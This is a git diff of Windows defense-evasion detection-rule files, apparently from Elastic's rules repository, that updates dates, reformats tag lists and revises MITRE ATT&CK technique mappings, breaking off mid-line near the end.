4b5e879dc86..d817fd8d7cf 100644 --- a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml +++ b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,20 +62,7 @@ DLL side-loading exploits the DLL search order to load malicious code into trust risk_score = 47 rule_id = "1160dcdb-0a0a-4a79-91d8-9b84616edebd" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" @@ -123,24 +110,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml index e1eaae3f8de..98338405475 100644 --- a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml +++ b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/07" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Dennis Perto"] @@ -63,19 +63,7 @@ references = [ risk_score = 73 rule_id = "053a0387-f3b5-4ba5-8245-8002cca2bd08" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -106,19 +94,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_file_creation_mult_extension.toml b/rules/windows/defense_evasion_file_creation_mult_extension.toml index 8725775f18e..d0b71e826a1 100644 --- a/rules/windows/defense_evasion_file_creation_mult_extension.toml +++ b/rules/windows/defense_evasion_file_creation_mult_extension.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,36 +98,18 @@ file where host.os.type == "windows" and event.type == "creation" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.007" name = "Double File Extension" reference = "https://attack.mitre.org/techniques/T1036/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml index 628a39d0949..b546108d92b 100644 --- a/rules/windows/defense_evasion_hide_encoded_executable_registry.toml +++ b/rules/windows/defense_evasion_hide_encoded_executable_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,19 +85,18 @@ registry where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_iis_httplogging_disabled.toml b/rules/windows/defense_evasion_iis_httplogging_disabled.toml index 1f7de5422de..9a117a755ba 100644 --- a/rules/windows/defense_evasion_iis_httplogging_disabled.toml +++ b/rules/windows/defense_evasion_iis_httplogging_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,19 +89,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.002" -name = "Disable Windows Event Logging" -reference = "https://attack.mitre.org/techniques/T1562/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_indirect_exec_conhost.toml b/rules/windows/defense_evasion_indirect_exec_conhost.toml index 12330d28d1f..9b8ba6a9f67 100644 --- a/rules/windows/defense_evasion_indirect_exec_conhost.toml +++ b/rules/windows/defense_evasion_indirect_exec_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,14 +80,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_injection_msbuild.toml b/rules/windows/defense_evasion_injection_msbuild.toml index 742f00543cf..593490f1528 100755 --- a/rules/windows/defense_evasion_injection_msbuild.toml +++ b/rules/windows/defense_evasion_injection_msbuild.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,36 +76,26 @@ process where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique]] -id = "T1127" -name = "Trusted Developer Utilities Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1127/" -[[rule.threat.technique.subtechnique]] -id = "T1127.001" -name = "MSBuild" -reference = "https://attack.mitre.org/techniques/T1127/001/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml index bc19ee7efbd..f7f2e8233a2 100644 --- a/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml +++ b/rules/windows/defense_evasion_lolbas_win_cdb_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,14 +95,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml index 6f434c174de..0801bc6399a 100644 --- a/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml +++ b/rules/windows/defense_evasion_lsass_ppl_disabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,6 +92,7 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -101,12 +102,6 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" diff --git a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml index 47bf071a3c6..bd9fa5b3fc7 100644 --- a/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml +++ b/rules/windows/defense_evasion_masquerading_as_elastic_endpoint_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -111,19 +111,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_masquerading_business_apps_installer.toml b/rules/windows/defense_evasion_masquerading_business_apps_installer.toml index 6b6d840dfd7..0a25a153287 100644 --- a/rules/windows/defense_evasion_masquerading_business_apps_installer.toml +++ b/rules/windows/defense_evasion_masquerading_business_apps_installer.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -22,17 +22,7 @@ references = [ risk_score = 21 rule_id = "feafdc51-c575-4ed2-89dd-8e20badc2d6c" severity = "low" -tags = [ - "Domain: Endpoint", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Initial Access", - "Tactic: Execution", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "OS: Windows", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -209,53 +199,36 @@ Business applications are integral to productivity, often downloaded and install [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1189" -name = "Drive-by Compromise" -reference = "https://attack.mitre.org/techniques/T1189/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_masquerading_communication_apps.toml b/rules/windows/defense_evasion_masquerading_communication_apps.toml index e280b7fae10..49a0ebbad28 100644 --- a/rules/windows/defense_evasion_masquerading_communication_apps.toml +++ b/rules/windows/defense_evasion_masquerading_communication_apps.toml @@ -2,7 +2,7 @@ creation_date = "2023/05/05" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -138,10 +138,12 @@ Communication apps are integral to modern workflows, facilitating seamless inter [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -152,22 +154,7 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml index f7808e814e3..3637fb30676 100644 --- a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml +++ b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,20 +66,7 @@ references = [ risk_score = 47 rule_id = "ac5012b8-8da8-440b-aaaf-aedafdea2dff" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -97,48 +84,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/defense_evasion_microsoft_defender_tampering.toml b/rules/windows/defense_evasion_microsoft_defender_tampering.toml index 2b7315a7978..b79e6aecbf5 100644 --- a/rules/windows/defense_evasion_microsoft_defender_tampering.toml +++ b/rules/windows/defense_evasion_microsoft_defender_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] @@ -140,6 +140,7 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -150,9 +151,12 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_modify_ownership_os_files.toml b/rules/windows/defense_evasion_modify_ownership_os_files.toml index 21d79ba0ec9..614c46dd467 100644 --- a/rules/windows/defense_evasion_modify_ownership_os_files.toml +++ b/rules/windows/defense_evasion_modify_ownership_os_files.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/02" +updated_date = "2026/03/23" [rule] @@ -58,21 +58,7 @@ Adversaries may modify file or directory ownership to evade access control lists risk_score = 47 rule_id = "7eb54028-ca72-4eb7-8185-b6864572347db" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -91,21 +77,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" + [[rule.threat.technique.subtechnique]] id = "T1222.001" name = "Windows File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - - - diff --git a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml index aee207a0bb1..4bb3d2cf781 100644 --- a/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml +++ b/rules/windows/defense_evasion_ms_office_suspicious_regmod.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/12" integration = ["windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,31 +103,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_msiexec_remote_payload.toml b/rules/windows/defense_evasion_msiexec_remote_payload.toml index ba656ec2c14..b5e88f594ac 100644 --- a/rules/windows/defense_evasion_msiexec_remote_payload.toml +++ b/rules/windows/defense_evasion_msiexec_remote_payload.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,20 +62,7 @@ MsiExec is a Windows utility for installing, maintaining, and removing software. risk_score = 73 rule_id = "c9847fe9-3bed-4e6b-b319-f9956d6dd02a" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -92,19 +79,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml index 1d239873113..e8f3559b58b 100644 --- a/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +++ b/rules/windows/defense_evasion_network_connection_from_windows_binary.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -166,34 +166,63 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.002" +name = "Control Panel" +reference = "https://attack.mitre.org/techniques/T1218/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique]] +id = "T1220" +name = "XSL Script Processing" +reference = "https://attack.mitre.org/techniques/T1220/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml index 33a09e0df4e..44d35cb942c 100644 --- a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml +++ b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/01" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,20 +66,7 @@ references = [ risk_score = 47 rule_id = "07b1ef73-1fde-4a49-a34a-5dd40011b076" severity = "medium" -tags = 